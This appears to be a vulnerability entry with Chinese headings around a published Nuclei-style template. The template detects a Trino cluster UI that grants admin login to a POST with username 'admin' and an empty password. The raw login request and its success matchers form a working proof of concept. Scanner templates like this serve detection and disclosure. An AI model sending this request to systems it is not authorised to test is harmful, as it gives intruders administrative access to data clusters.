漏洞描述
The /ui/login endpoint accepted a POST request with username=admin and an empty password, which resulted in a successful login. This indicated improper authentication validation or a default/admin account misconfiguration.
cluster-trino-admin-login: Cluster Overview Trino - Admin Login
PoC代码[已公开]
id: cluster-trino-admin-login
info:
name: Cluster Overview Trino - Admin Login
author: DhiyaneshDK
severity: high
description: |
The /ui/login endpoint accepted a POST request with username=admin and an empty password, which resulted in a successful login. This indicated improper authentication validation or a default/admin account misconfiguration.
metadata:
verified: true
max-request: 1
tags: vuln,misconfig,dashboard,cluster,trino
variables:
username: admin
http:
- raw:
- |
POST /ui/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password=&redirectPath=
matchers-condition: and
matchers:
- type: word
part: set_cookie
words:
- "Trino-UI-Token"
- type: status
status:
- 303
# digest: 4a0a00473045022100ffad0cde31b715a6391968c6aa5f021d0553139dac00288c1893c4bff888d517022044dc92f3f8e6286a807f797513a52ebada6bb4d1f60651340acc9fcd4e916364:922c64590222798bb761d5b6d8e72950